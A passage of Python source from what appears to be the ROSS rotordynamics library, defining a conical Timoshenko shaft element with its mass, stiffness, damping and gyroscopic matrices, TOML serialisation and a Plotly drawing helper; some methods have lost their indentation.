and :math:`\beta_0` and :math:`\beta_1` are the bending on the xz plane.
Parameters
----------
L : float, pint.Quantity
Element length (m).
idl : float, pint.Quantity
Inner diameter of the element at the left position (m).
odl : float, pint.Quantity
Outer diameter of the element at the left position (m).
idr : float, pint.Quantity, optional
Inner diameter of the element at the right position (m).
Default is equal to idl value (cylindrical element).
odr : float, pint.Quantity, optional
Outer diameter of the element at the right position (m).
Default is equal to odl value (cylindrical element).
material : ross.Material
Shaft material.
n : int, optional
Element number (coincident with it's first node).
If not given, it will be set when the rotor is assembled
according to the element's position in the list supplied to
the rotor constructor.
axial_force : float, optional
Axial force (N).
torque : float, optional
Torque (N*m).
shear_effects : bool, optional
Determine if shear effects are taken into account.
Default is True.
rotary_inertia : bool, optional
Determine if rotary_inertia effects are taken into account.
Default is True.
gyroscopic : bool, optional
Determine if gyroscopic effects are taken into account.
Default is True.
shear_method_calc : str, optional
Determines which shear calculation method the user will adopt
Default is 'cowper'
tag : str, optional
Element tag.
Default is None.
Returns
-------
shaft_element : ross.ShaftElement
A shaft_element object.
Attributes
----------
Poisson : float
Poisson coefficient for the element.
A : float
Element section area at half length (m**2).
A_l : float
Element section area at left end (m**2).
A_r : float
Element section area at right end (m**2).
beam_cg : float
Element center of gravity local position (m).
axial_cg_pos : float
Element center of gravity global position (m).
This should be used only after the rotor is built.
Default is None.
Ie : float
Ie is the second moment of area of the cross section about
the neutral plane (m**4).
phi : float
Constant that is used according to :cite:`friswell2010dynamics` to
consider rotary inertia and shear effects. If these are not considered
:math:`\phi=0`.
kappa : float
Shear coefficient for the element.
References
----------
.. bibliography::
:filter: docname in docnames
Examples
--------
>>> from ross.materials import steel
>>> Euler_Bernoulli_Element = ShaftElement(
... material=steel, L=0.5, idl=0.05, odl=0.1,
... idr=0.05, odr=0.15,
... rotary_inertia=False,
... shear_effects=False)
>>> Euler_Bernoulli_Element.phi
0
>>> Timoshenko_Element = ShaftElement(
... material=steel, L=0.5, idl=0.05, odl=0.1,
... rotary_inertia=True,
... shear_effects=True)
>>> Timoshenko_Element.phi
0.1571268472906404
"""
    @check_units
    def __init__(
        self,
        L,
        idl,
        odl,
        idr=None,
        odr=None,
        material=None,
        n=None,
        axial_force=0,
        torque=0,
        shear_effects=True,
        rotary_inertia=True,
        gyroscopic=True,
        shear_method_calc="cowper",
        tag=None,
    ):
        """Initialize the shaft element.

        Parameters are documented in the class docstring.  The element is
        conical in general (left/right diameters may differ); the series
        coefficients a1, a2, b1, b2, gama, delta describe how the cross
        section area and second moment of area vary along the element.
        """
        # A conical element degenerates to a cylinder when only the left
        # diameters are given.
        if idr is None:
            idr = idl
        if odr is None:
            odr = odl
        if material is None:
            raise AttributeError("Material is not defined.")
        # Accept either a Material instance or the name of a saved material.
        if type(material) is str:
            self.material = Material.load_material(material)
        else:
            self.material = material
        self.shear_effects = shear_effects
        self.rotary_inertia = rotary_inertia
        self.gyroscopic = gyroscopic
        self.axial_force = axial_force
        self.torque = torque
        # Node numbering: n_l is the left node, n_r the right node (n + 1).
        self._n = n
        self.n_l = n
        self.n_r = None
        if n is not None:
            self.n_r = n + 1
        self.tag = tag
        self.shear_method_calc = shear_method_calc
        self.L = float(L)
        # Mean outer/inner diameters at half length.
        self.o_d = (float(odl) + float(odr)) / 2
        self.i_d = (float(idl) + float(idr)) / 2
        self.idl = float(idl)
        self.odl = float(odl)
        self.idr = float(idr)
        self.odr = float(odr)
        self.color = self.material.color
        # Proportional damping factors; zero here, overridden by the 6 DoF subclass.
        self.alpha = 0.0
        self.beta = 0.0
        # A_l = cross section area from the left side of the element
        # A_r = cross section area from the right side of the element
        A_l = np.pi * (odl ** 2 - idl ** 2) / 4
        A_r = np.pi * (odr ** 2 - idr ** 2) / 4
        self.A_l = A_l
        self.A_r = A_r
        # Second moment of area of the cross section from the left side
        # of the element
        Ie_l = np.pi * (odl ** 4 - idl ** 4) / 64
        # Volume of the conical frustum shell (outer solid minus bore).
        outer = self.odl ** 2 + self.odl * self.odr + self.odr ** 2
        inner = self.idl ** 2 + self.idl * self.idr + self.idr ** 2
        self.volume = np.pi * (self.L / 12) * (outer - inner)
        self.m = self.material.rho * self.volume
        # Outer (ro*) / inner (ri*) radii at the left (j) and right (k) nodes.
        roj = odl / 2
        rij = idl / 2
        rok = odr / 2
        rik = idr / 2
        # geometrical coefficients (taper expansion of area and inertia)
        delta_ro = rok - roj
        delta_ri = rik - rij
        a1 = 2 * np.pi * (roj * delta_ro - rij * delta_ri) / A_l
        a2 = np.pi * (roj ** 3 * delta_ro - rij ** 3 * delta_ri) / Ie_l
        b1 = np.pi * (delta_ro ** 2 - delta_ri ** 2) / A_l
        b2 = (
            3
            * np.pi
            * (roj ** 2 * delta_ro ** 2 - rij ** 2 * delta_ri ** 2)
            / (2 * Ie_l)
        )
        gama = np.pi * (roj * delta_ro ** 3 - rij * delta_ri ** 3) / Ie_l
        delta = np.pi * (delta_ro ** 4 - delta_ri ** 4) / (4 * Ie_l)
        self.a1 = a1
        self.a2 = a2
        self.b1 = b1
        self.b2 = b2
        self.gama = gama
        self.delta = delta
        # the area is calculated from the cross section located in the middle
        # of the element (series evaluated at the midpoint, 0.5)
        self.A = A_l * (1 + a1 * 0.5 + b1 * 0.5 ** 2)
        # Ie is the second moment of area of the cross section - located in
        # the middle of the element - about the neutral plane
        Ie = Ie_l * (1 + a2 * 0.5 + b2 * 0.5 ** 2 + gama * 0.5 ** 3 + delta * 0.5 ** 4)
        self.Ie = Ie
        self.Ie_l = Ie_l
        # phi stays 0 when shear effects are disabled (Euler-Bernoulli beam).
        phi = 0
        # geometric center
        c1 = (
            roj ** 2
            + 2 * roj * rok
            + 3 * rok ** 2
            - rij ** 2
            - 2 * rij * rik
            - 3 * rik ** 2
        )
        c2 = (roj ** 2 + roj * rok + rok ** 2) - (rij ** 2 + rij * rik + rik ** 2)
        self.beam_cg = L * c1 / (4 * c2)
        self.axial_cg_pos = None
        # Slenderness ratio of beam elements (G*A*L**2) / (E*I)
        sld = (self.material.G_s * self.A * self.L ** 2) / (self.material.E * Ie)
        self.slenderness_ratio = sld
        # Moment of inertia
        # fmt: off
        self.Im = (
            (np.pi * L * (self.m / self.volume) / 10) *
            ((roj ** 4 + roj ** 3 * rok + roj ** 2 * rok ** 2 + roj * rok ** 3 + rok ** 4) -
             (rij ** 4 + rij ** 3 * rik + rij ** 2 * rik ** 2 + rij * rik ** 3 + rik ** 4))
        )
        # fmt: on
        # picking a method to calculate the shear coefficient
        # List of available methods:
        # hutchinson - kappa as per Hutchinson (2001)
        # cowper - kappa as per Cowper (1996)
        if shear_effects:
            # r = mean inner diameter / mean outer diameter
            r = ((idl + idr) / 2) / ((odl + odr) / 2)
            r2 = r * r
            r12 = (1 + r2) ** 2
            if shear_method_calc == "hutchinson":
                # Shear coefficient (phi)
                # kappa as per Hutchinson (2001)
                # fmt: off
                kappa = 6 * r12 * ((1 + self.material.Poisson) /
                        ((r12 * (7 + 12 * self.material.Poisson + 4 * self.material.Poisson ** 2) +
                        4 * r2 * (5 + 6 * self.material.Poisson + 2 * self.material.Poisson ** 2))))
                # fmt: on
            elif shear_method_calc == "cowper":
                # kappa as per Cowper (1996)
                # fmt: off
                kappa = 6 * r12 * (
                    (1 + self.material.Poisson)
                    / (r12 * (7 + 6 * self.material.Poisson) + r2 * (20 + 12 * self.material.Poisson))
                )
                # fmt: on
            else:
                raise Warning(
                    "This method of calculating shear coefficients is not implemented. See guide for futher informations."
                )
            # fmt: off
            phi = 12 * self.material.E * self.Ie / (self.material.G_s * kappa * self.A * L ** 2)
            # fmt: on
            self.kappa = kappa
        self.phi = phi
        self.dof_global_index = None
def __eq__(self, other):
"""Equality method for comparasions.
Parameters
----------
other : obj
parameter for comparasion
Returns
-------
bool
True if the comparison is true; False otherwise.
Example
-------
>>> from ross.materials import steel
>>> shaft1 = ShaftElement(
... L=0.25, idl=0, idr=0, odl=0.05, odr=0.08,
... material=steel, rotary_inertia=True, shear_effects=True
... )
>>> shaft2 = ShaftElement(
... L=0.25, idl=0, idr=0, odl=0.05, odr=0.08,
... material=steel, rotary_inertia=True, shear_effects=True
... )
>>> shaft1 == shaft2
True
"""
if self.__dict__ == other.__dict__:
return True
else:
return False
    def __repr__(self):
        """Return a string representation of a shaft element.

        Returns
        -------
        A string representation of a shaft element object.

        Examples
        --------
        >>> from ross.materials import steel
        >>> shaft1 = ShaftElement(
        ...     L=0.25, idl=0, idr=0, odl=0.05, odr=0.08,
        ...     material=steel, rotary_inertia=True, shear_effects=True
        ... )
        >>> shaft1 # doctest: +ELLIPSIS
        ShaftElement(L=0.25, idl=0.0...
        """
        # ``{0}.{5}`` is a nested format spec (width 0, precision 5), so each
        # dimension prints with 5 significant digits.
        return (
            f"{self.__class__.__name__}"
            f"(L={self.L:{0}.{5}}, idl={self.idl:{0}.{5}}, "
            f"idr={self.idr:{0}.{5}}, odl={self.odl:{0}.{5}}, "
            f"odr={self.odr:{0}.{5}}, material={self.material.name!r}, "
            f"n={self.n})"
        )
    def __str__(self):
        """Convert object into string.

        Returns
        -------
        The object's parameters translated to strings

        Example
        -------
        >>> print(ShaftElement(L=0.25, idl=0, odl=0.05, odr=0.08, material=steel))
        Element Number:             None
        Element Lenght   (m):       0.25
        Left Int. Diam.  (m):        0.0
        Left Out. Diam.  (m):       0.05
        Right Int. Diam. (m):        0.0
        Right Out. Diam. (m):       0.08
        -----------------------------------
        Steel
        -----------------------------------
        Density         (kg/m**3): 7810.0
        Young`s modulus (N/m**2):  2.11e+11
        Shear modulus   (N/m**2):  8.12e+10
        Poisson coefficient     :  0.29926108
        """
        # ``{10}.{5}`` right-aligns each value in a 10-char field with
        # 5 significant digits; the 35-dash line separates the material
        # section (whose own __str__ is appended).
        return (
            f"Element Number: {self.n}"
            f"\nElement Lenght (m): {self.L:{10}.{5}}"
            f"\nLeft Int. Diam. (m): {self.idl:{10}.{5}}"
            f"\nLeft Out. Diam. (m): {self.odl:{10}.{5}}"
            f"\nRight Int. Diam. (m): {self.idr:{10}.{5}}"
            f"\nRight Out. Diam. (m): {self.odr:{10}.{5}}"
            f'\n{35*"-"}'
            f"\n{self.material}"
        )
    def __hash__(self):
        """Hash the element by its tag so elements can be used in sets/dicts.

        NOTE(review): __eq__ compares the full __dict__ while the hash uses
        only ``tag``; equal elements have equal tags, so the hash/eq contract
        holds, but distinct elements sharing a tag will collide.
        """
        return hash(self.tag)
    def save(self, file):
        """Append this element's constructor arguments to a toml file.

        The keys written are exactly the ``__init__`` parameter names, so
        :meth:`read_toml_data` can rebuild the element with ``cls(**data)``.

        Parameters
        ----------
        file : str or path-like
            Path of the toml file; created if it does not exist, merged
            into if it does.
        """
        # Introspect __init__ so the saved dict always matches the signature.
        signature = inspect.signature(self.__init__)
        args_list = list(signature.parameters)
        args = {arg: getattr(self, arg) for arg in args_list}
        # add material characteristics so that the shaft element can be reconstructed
        # even if the material is not in the available_materials file.
        args["material"] = {
            "name": self.material.name,
            "rho": self.material.rho,
            "E": self.material.E,
            "G_s": self.material.G_s,
            "color": self.material.color,
        }
        # Merge with any existing file content; a missing file starts fresh.
        try:
            data = toml.load(file)
        except FileNotFoundError:
            data = {}
        data[f"{self.__class__.__name__}_{self.tag}"] = args
        with open(file, "w") as f:
            toml.dump(data, f)
    @classmethod
    def read_toml_data(cls, data):
        """Rebuild an element from a dict previously written by :meth:`save`.

        Parameters
        ----------
        data : dict
            Constructor keyword arguments; ``data["material"]`` holds the
            material's attributes and is converted back to a Material here.
        """
        data["material"] = Material(**data["material"])
        return cls(**data)
    @property
    def n(self):
        """Return the element number (settable property).

        Returns
        -------
        n : int
            Element number
        """
        return self._n
@n.setter
def n(self, value):
"""Set a new value for the element number.
Parameters
----------
value : int
element number
Example
-------
>>> from ross.materials import steel
>>> shaft1 = ShaftElement(
... L=0.25, idl=0, idr=0, odl=0.05, odr=0.08,
... material=steel, rotary_inertia=True, shear_effects=True
... )
>>> shaft1.n = 0
>>> shaft1 # doctest: +ELLIPSIS
ShaftElement(L=0.25, idl=0.0...
"""
self._n = value
self.n_l = value
if value is not None:
self.n_r = value + 1
def dof_mapping(self):
"""Degrees of freedom mapping.
Returns a dictionary with a mapping between degree of freedom and its index.
Returns
-------
dof_mapping : dict
A dictionary containing the degrees of freedom and their indexes.
Examples
--------
The numbering of the degrees of freedom for each node.
Being the following their ordering for a node:
x_0 - horizontal translation
y_0 - vertical translation
z_0 - axial translation
alpha_0 - rotation around horizontal
beta_0 - rotation around vertical
theta_0 - torsion around axial
>>> sh = ShaftElement(L=0.5, idl=0.05, odl=0.1, material=steel,
... rotary_inertia=True, shear_effects=True)
>>> sh.dof_mapping()["x_0"]
0
"""
return dict(
x_0=0, y_0=1, alpha_0=2, beta_0=3, x_1=4, y_1=5, alpha_1=6, beta_1=7
)
    def M(self):
        """Mass matrix for an instance of a shaft element.

        Returns
        -------
        M : np.ndarray
            Mass matrix for the shaft element.

        Examples
        --------
        >>> Timoshenko_Element = ShaftElement(
        ...     L=0.5, idl=0.05, idr=0.05, odl=0.1,
        ...     odr=0.15, material=steel,
        ...     rotary_inertia=True,
        ...     shear_effects=True)
        >>> Timoshenko_Element.M()[:4, :4]
        array([[11.36986417,  0.        ,  0.        ,  0.86197637],
               [ 0.        , 11.36986417, -0.86197637,  0.        ],
               [ 0.        , -0.86197637,  0.08667495,  0.        ],
               [ 0.86197637,  0.        ,  0.        ,  0.08667495]])
        """
        phi = self.phi
        L = self.L
        a1 = self.a1
        a2 = self.a2
        b1 = self.b1
        b2 = self.b2
        delta = self.delta
        gama = self.gama
        Ie_l = self.Ie_l
        A_l = self.A_l
        # m1..m10: polynomial coefficients of the translational mass matrix
        # in phi (shear) with a1/b1 taper corrections — presumably from the
        # reference cited on the class (friswell2010dynamics); TODO confirm.
        m1 = (
            (468 + 882 * phi + 420 * phi ** 2)
            + a1 * (108 + 210 * phi + 105 * phi ** 2)
            + b1 * (38 + 78 * phi + 42 * phi ** 2)
        )
        m2 = (
            (66 + 115.5 * phi + 52.5 * phi ** 2)
            + a1 * (21 + 40.5 * phi + 21 * phi ** 2)
            + b1 * (8.5 + 18 * phi + 10.5 * phi ** 2)
        )
        m3 = (
            (162 + 378 * phi + 210 * phi ** 2)
            + a1 * (81 + 189 * phi + 105 * phi ** 2)
            + b1 * (46 + 111 * phi + 63 * phi ** 2)
        )
        m4 = (
            (39 + 94.5 * phi + 52.5 * phi ** 2)
            + a1 * (18 + 40.5 * phi + 21 * phi ** 2)
            + b1 * (9.5 + 21 * phi + 10.5 * phi ** 2)
        )
        m5 = (
            (12 + 21 * phi + 10.5 * phi ** 2)
            + a1 * (4.5 + 9 * phi + 5.25 * phi ** 2)
            + b1 * (2 + 4.5 * phi + 3 * phi ** 2)
        )
        m6 = (
            (39 + 94.5 * phi + 52.5 * phi ** 2)
            + a1 * (21 + 54 * phi + 31.5 * phi ** 2)
            + b1 * (12.5 + 34.5 * phi + 21 * phi ** 2)
        )
        m7 = (
            (9 + 21 * phi + 10.5 * phi ** 2)
            + a1 * (4.5 + 10.5 * phi + 5.25 * phi ** 2)
            + b1 * (2.5 + 6 * phi + 3 * phi ** 2)
        )
        m8 = (
            (468 + 882 * phi + 420 * phi ** 2)
            + a1 * (360 + 672 * phi + 315 * phi ** 2)
            + b1 * (290 + 540 * phi + 252 * phi ** 2)
        )
        m9 = (
            (66 + 115.5 * phi + 52.5 * phi ** 2)
            + a1 * (45 + 75 * phi + 31.5 * phi ** 2)
            + b1 * (32.5 + 52.5 * phi + 21 * phi ** 2)
        )
        m10 = (
            (12 + 21 * phi + 10.5 * phi ** 2)
            + a1 * (7.5 + 12 * phi + 5.25 * phi ** 2)
            + b1 * (5 + 7.5 * phi + 3 * phi ** 2)
        )
        # Translational mass matrix (8x8, DOFs per dof_mapping ordering).
        # fmt: off
        Mt = np.array([
            [   m1,     0,        0,     L*m2,    m3,     0,        0,    -L*m4],
            [    0,    m1,    -L*m2,        0,     0,    m3,     L*m4,        0],
            [    0, -L*m2,  L**2*m5,        0,     0, -L*m6, -L**2*m7,        0],
            [ L*m2,     0,        0,  L**2*m5,  L*m6,     0,        0, -L**2*m7],
            [   m3,     0,        0,     L*m6,    m8,     0,        0,    -L*m9],
            [    0,    m3,    -L*m6,        0,     0,    m8,     L*m9,        0],
            [    0,  L*m4, -L**2*m7,        0,     0,  L*m9, L**2*m10,        0],
            [-L*m4,     0,        0, -L**2*m7, -L*m9,     0,        0, L**2*m10],
        ])
        # fmt: on
        M = self.material.rho * A_l * L * Mt / (1260 * (1 + phi) ** 2)
        if self.rotary_inertia:
            # Rotary inertia contribution; the m11..m16 coefficients are the
            # same polynomials used as g1..g6 in G().
            # fmt: off
            m11 = 252 + 126 * a2 + 72 * b2 + 45 * gama + 30 * delta
            m12 = (
                21 - 105 * phi
                + a2 * (21 - 42 * phi)
                + b2 * (15 - 21 * phi)
                + gama * (10.5 - 12 * phi)
                + delta * (7.5 - 7.5 * phi)
            )
            m13 = (
                21 - 105 * phi
                - 63 * a2 * phi
                - b2 * (6 + 42 * phi)
                - gama * (7.5 + 30 * phi)
                - delta * (7.5 + 22.5 * phi)
            )
            m14 = (
                28 + 35 * phi + 70 * phi ** 2
                + a2 * (7 - 7 * phi + 17.5 * phi ** 2)
                + b2 * (4 - 7 * phi + 7 * phi ** 2)
                + gama * (2.75 - 5 * phi + 3.5 * phi ** 2)
                + delta * (2 - 3.5 * phi + 2 * phi ** 2)
            )
            m15 = (
                7 + 35 * phi - 35 * phi ** 2
                + a2 * (3.5 + 17.5 * phi - 17.5 * phi ** 2)
                + b2 * (3 + 10.5 * phi - 10.5 * phi ** 2)
                + gama * (2.75 + 7 * phi - 7 * phi ** 2)
                + delta * (2.5 + 5 * phi - 5 * phi ** 2)
            )
            m16 = (
                28 + 35 * phi + 70 * phi ** 2
                + a2 * (21 + 42 * phi + 52.5 * phi ** 2)
                + b2 * (18 + 42 * phi + 42 * phi ** 2)
                + gama * (16.25 + 40 * phi + 35 * phi ** 2)
                + delta * (15 + 37.5 * phi + 30 * phi ** 2)
            )
            Mr = np.array([
                [  m11,      0,         0,     L*m12,   -m11,      0,         0,     L*m13],
                [    0,    m11,    -L*m12,         0,      0,   -m11,    -L*m13,         0],
                [    0, -L*m12,  L**2*m14,         0,      0,  L*m12, -L**2*m15,         0],
                [L*m12,      0,         0,  L**2*m14, -L*m12,      0,         0, -L**2*m15],
                [ -m11,      0,         0,    -L*m12,    m11,      0,         0,    -L*m13],
                [    0,   -m11,     L*m12,         0,      0,    m11,     L*m13,         0],
                [    0, -L*m13, -L**2*m15,         0,      0,  L*m13,  L**2*m16,         0],
                [L*m13,      0,         0, -L**2*m15, -L*m13,      0,         0,  L**2*m16],
            ])
            # fmt: on
            Mr = self.material.rho * Ie_l * Mr / (210 * L * (1 + phi) ** 2)
            M = M + Mr
        return M
    def K(self):
        """Stiffness matrix for an instance of a shaft element.

        Returns
        -------
        K : np.ndarray
            Stiffness matrix for the shaft element.

        Examples
        --------
        >>> from ross.materials import steel
        >>> Timoshenko_Element = ShaftElement(
        ...     L=0.5, idl=0.05, idr=0.05, odl=0.1,
        ...     odr=0.15, material=steel,
        ...     rotary_inertia=True,
        ...     shear_effects=True)
        >>> Timoshenko_Element.K()[:4, :4]/1e6
        array([[209.25641985,   0.        ,   0.        ,  38.62129051],
               [  0.        , 209.25641985, -38.62129051,   0.        ],
               [  0.        , -38.62129051,  11.56619973,   0.        ],
               [ 38.62129051,   0.        ,   0.        ,  11.56619973]])
        """
        L = self.L
        phi = self.phi
        a1 = self.a1
        a2 = self.a2
        b1 = self.b1
        b2 = self.b2
        delta = self.delta
        gama = self.gama
        Ie_l = self.Ie_l
        # k1..k6 build the bending stiffness (K1); k7..k9 the shear
        # correction (K2), blended below with weight 105*phi.
        # fmt: off
        k1 = 1260 + 630 * a2 + 504 * b2 + 441 * gama + 396 * delta
        k2 = (
            630
            + 210 * a2
            + 147 * b2
            + 126 * gama
            + 114 * delta
            - phi * (105 * a2 + 105 * b2 + 94.5 * gama + 84 * delta)
        )
        k3 = (
            630
            + 420 * a2
            + 357 * b2
            + 315 * gama
            + 282 * delta
            + phi * (105 * a2 + 105 * b2 + 94.5 * gama + 84 * delta)
        )
        k4 = (
            420 + 210 * phi + 105 * phi ** 2
            + a2 * (105 + 52.5 * phi ** 2)
            + b2 * (56 - 35 * phi + 35 * phi ** 2)
            + gama * (42 - 42 * phi + 26.25 * phi ** 2)
            + delta * (36 - 42 * phi + 21 * phi ** 2)
        )
        k5 = (
            210 - 210 * phi - 105 * phi ** 2
            + a2 * (105 - 105 * phi - 52.5 * phi ** 2)
            + b2 * (91 - 70 * phi - 35 * phi ** 2)
            + gama * (84 - 52.5 * phi - 26.25 * phi ** 2)
            + delta * (78 - 42 * phi - 21 * phi ** 2)
        )
        k6 = (
            420 + 210 * phi + 105 * phi ** 2
            + a2 * (315 + 210 * phi + 52.5 * phi ** 2)
            + b2 * (266 + 175 * phi + 35 * phi ** 2)
            + gama * (231 + 147 * phi + 26.25 * phi ** 2)
            + delta * (204 + 126 * phi + 21 * phi ** 2)
        )
        k7 = 12 + 6 * a1 + 4 * b1
        k8 = 6 + 3 * a1 + 2 * b1
        k9 = 3 + 1.5 * a1 + b1
        K1 = np.array([
            [  k1,     0,       0,    L*k2,   -k1,     0,       0,    L*k3],
            [   0,    k1,   -L*k2,       0,     0,   -k1,   -L*k3,       0],
            [   0, -L*k2, L**2*k4,       0,     0,  L*k2, L**2*k5,       0],
            [L*k2,     0,       0, L**2*k4, -L*k2,     0,       0, L**2*k5],
            [ -k1,     0,       0,   -L*k2,    k1,     0,       0,   -L*k3],
            [   0,   -k1,    L*k2,       0,     0,    k1,    L*k3,       0],
            [   0, -L*k3, L**2*k5,       0,     0,  L*k3, L**2*k6,       0],
            [L*k3,     0,       0, L**2*k5, -L*k3,     0,       0, L**2*k6],
        ])
        K2 = np.array([
            [  k7,     0,       0,    L*k8,   -k7,     0,       0,    L*k8],
            [   0,    k7,   -L*k8,       0,     0,   -k7,   -L*k8,       0],
            [   0, -L*k8, L**2*k9,       0,     0,  L*k8, L**2*k9,       0],
            [L*k8,     0,       0, L**2*k9, -L*k8,     0,       0, L**2*k9],
            [ -k7,     0,       0,   -L*k8,    k7,     0,       0,   -L*k8],
            [   0,   -k7,    L*k8,       0,     0,    k7,    L*k8,       0],
            [   0, -L*k8, L**2*k9,       0,     0,  L*k8, L**2*k9,       0],
            [L*k8,     0,       0, L**2*k9, -L*k8,     0,       0, L**2*k9],
        ])
        K = self.material.E * Ie_l / (105 * L ** 3 * (1 + phi) ** 2) * (K1 + 105 * phi * K2)
        # fmt: on
        return K
    def C(self):
        """Damping matrix for an instance of a shaft element.

        Returns
        -------
        C : np.array
            Damping matrix for the shaft element.

        Examples
        --------
        >>> from ross.materials import steel
        >>> Timoshenko_Element = ShaftElement(
        ...     L=0.5, idl=0.05, idr=0.05, odl=0.1,
        ...     odr=0.15, material=steel,
        ...     rotary_inertia=True,
        ...     shear_effects=True)
        >>> Timoshenko_Element.C()[:4, :4]
        array([[0., 0., 0., 0.],
               [0., 0., 0., 0.],
               [0., 0., 0., 0.],
               [0., 0., 0., 0.]])
        """
        # The 8 DoF element has no internal damping; a zero matrix keeps the
        # assembled rotor matrices shape-consistent.
        C = np.zeros((8, 8))
        return C
    def G(self):
        """Gyroscopic matrix for an instance of a shaft element.

        Returns
        -------
        G : np.ndarray
            Gyroscopic matrix for the shaft element.

        Examples
        --------
        >>> from ross.materials import steel
        >>> # Timoshenko is the default shaft element
        >>> Timoshenko_Element = ShaftElement(
        ...     L=0.5, idl=0.05, idr=0.05, odl=0.1,
        ...     odr=0.15, material=steel,
        ...     rotary_inertia=True,
        ...     shear_effects=True)
        >>> Timoshenko_Element.G()[:4, :4]
        array([[ 0.        ,  0.30940809, -0.01085902,  0.        ],
               [-0.30940809,  0.        ,  0.        , -0.01085902],
               [ 0.01085902,  0.        ,  0.        ,  0.0067206 ],
               [ 0.        ,  0.01085902, -0.0067206 ,  0.        ]])
        """
        if self.gyroscopic:
            phi = self.phi
            L = self.L
            a2 = self.a2
            b2 = self.b2
            delta = self.delta
            gama = self.gama
            Ie_l = self.Ie_l
            # g1..g6 are the same polynomial coefficients as the rotary
            # inertia terms m11..m16 in M(); only the matrix layout and the
            # factor of 2 in the scaling below differ.
            # fmt: off
            g1 = 252 + 126 * a2 + 72 * b2 + 45 * gama + 30 * delta
            g2 = (
                21 - 105 * phi
                + a2 * (21 - 42 * phi)
                + b2 * (15 - 21 * phi)
                + gama * (10.5 - 12 * phi)
                + delta * (7.5 - 7.5 * phi)
            )
            g3 = (
                21 - 105 * phi
                - 63 * a2 * phi
                - b2 * (6 + 42 * phi)
                - gama * (7.5 + 30 * phi)
                - delta * (7.5 + 22.5 * phi)
            )
            g4 = (
                28 + 35 * phi + 70 * phi ** 2
                + a2 * (7 - 7 * phi + 17.5 * phi ** 2)
                + b2 * (4 - 7 * phi + 7 * phi ** 2)
                + gama * (2.75 - 5 * phi + 3.5 * phi ** 2)
                + delta * (2 - 3.5 * phi + 2 * phi ** 2)
            )
            g5 = (
                7 + 35 * phi - 35 * phi ** 2
                + a2 * (3.5 + 17.5 * phi - 17.5 * phi ** 2)
                + b2 * (3 + 10.5 * phi - 10.5 * phi ** 2)
                + gama * (2.75 + 7 * phi - 7 * phi ** 2)
                + delta * (2.5 + 5 * phi - 5 * phi ** 2)
            )
            g6 = (
                28 + 35 * phi + 70 * phi ** 2
                + a2 * (21 + 42 * phi + 52.5 * phi ** 2)
                + b2 * (18 + 42 * phi + 42 * phi ** 2)
                + gama * (16.25 + 40 * phi + 35 * phi ** 2)
                + delta * (15 + 37.5 * phi + 30 * phi ** 2)
            )
            G = np.array([
                [    0,    g1,    -L*g2,        0,     0,   -g1,    -L*g3,        0],
                [  -g1,     0,        0,    -L*g2,    g1,     0,        0,    -L*g3],
                [ L*g2,     0,        0,  L**2*g4, -L*g2,     0,        0, -L**2*g5],
                [    0,  L*g2, -L**2*g4,        0,     0, -L*g2,  L**2*g5,        0],
                [    0,   -g1,     L*g2,        0,     0,    g1,     L*g3,        0],
                [   g1,     0,        0,     L*g2,   -g1,     0,        0,     L*g3],
                [ L*g3,     0,        0, -L**2*g5, -L*g3,     0,        0,  L**2*g6],
                [    0,  L*g3,  L**2*g5,        0,     0, -L*g3, -L**2*g6,        0],
            ])
            # fmt: on
            G = self.material.rho * Ie_l * 2 * G / (210 * L * (1 + phi) ** 2)
        else:
            # Gyroscopic effects disabled: contribute nothing to the rotor.
            G = np.zeros((8, 8))
        return G
    def _patch(self, position, check_sld, fig, units):
        """Shaft element patch.

        Patch that will be used to draw the shaft element using Plotly library.

        Parameters
        ----------
        position : float
            Position in which the patch will be drawn.
        check_sld : bool
            If True, HoverTool displays only the slenderness ratio and color
            the elements in yellow if slenderness ratio < 1.6
        fig : plotly.graph_objects.Figure
            The figure object which traces are added on.
        units : str, optional
            Element length and radius units.
            Default is 'm'.

        Returns
        -------
        fig : plotly.graph_objects.Figure
            The figure object which traces are added on.
        """
        # Highlight short, stubby elements when slenderness checking is on.
        if check_sld is True and self.slenderness_ratio < 1.6:
            color = "yellow"
            legend = "Shaft - Slenderness Ratio < 1.6"
        else:
            color = self.material.color
            legend = "Shaft"
        # plot the shaft
        # The element outline: upper half traces idl -> odl -> odr -> idr,
        # the lower half mirrors it below the axis; z runs along the rotor.
        z_upper = [position, position, position + self.L, position + self.L, position]
        y_upper = [self.idl / 2, self.odl / 2, self.odr / 2, self.idr / 2, self.idl / 2]
        z_lower = [position, position, position + self.L, position + self.L, position]
        y_lower = [
            -self.idl / 2,
            -self.odl / 2,
            -self.odr / 2,
            -self.idr / 2,
            -self.idl / 2,
        ]
        # NOTE(review): extend() mutates z_upper/y_upper in place (z_pos is an
        # alias, not a copy); harmless here since they are not reused.
        z_pos = z_upper
        z_pos.extend(z_lower)
        y_pos = y_upper
        y_pos.extend(y_lower)
        # Hover text: slenderness-only, or full geometry (the 6 DoF subclass
        # additionally shows its proportional damping factors).
        if check_sld:
            customdata = [self.n, self.slenderness_ratio]
            hovertemplate = (
                f"Element Number: {customdata[0]}<br>"
                + f"Slenderness Ratio: {customdata[1]:.3f}"
            )
        else:
            if isinstance(self, ShaftElement6DoF):
                customdata = [
                    self.n,
                    Q_(self.odl, "m").to(units).m,
                    Q_(self.idl, "m").to(units).m,
                    Q_(self.odr, "m").to(units).m,
                    Q_(self.idr, "m").to(units).m,
                    self.alpha,
                    self.beta,
                    Q_(self.L, "m").to(units).m,
                    self.material.name,
                ]
                hovertemplate = (
                    f"Element Number: {customdata[0]}<br>"
                    + f"Left Outer Diameter: {round(customdata[1], 6)} {units}<br>"
                    + f"Left Inner Diameter: {round(customdata[2], 6)} {units}<br>"
                    + f"Right Outer Diameter: {round(customdata[3], 6)} {units}<br>"
                    + f"Right Inner Diameter: {round(customdata[4], 6)} {units}<br>"
                    + f"Alpha Damp. Factor: {round(customdata[5], 6)}<br>"
                    + f"Beta Damp. Factor: {round(customdata[6], 6)}<br>"
                    + f"Element Length: {round(customdata[7], 6)} {units} <br>"
                    + f"Material: {customdata[8]}<br>"
                )
            else:
                customdata = [
                    self.n,
                    Q_(self.odl, "m").to(units).m,
                    Q_(self.idl, "m").to(units).m,
                    Q_(self.odr, "m").to(units).m,
                    Q_(self.idr, "m").to(units).m,
                    Q_(self.L, "m").to(units).m,
                    self.material.name,
                ]
                hovertemplate = (
                    f"Element Number: {customdata[0]}<br>"
                    + f"Left Outer Diameter: {round(customdata[1], 6)} {units}<br>"
                    + f"Left Inner Diameter: {round(customdata[2], 6)} {units}<br>"
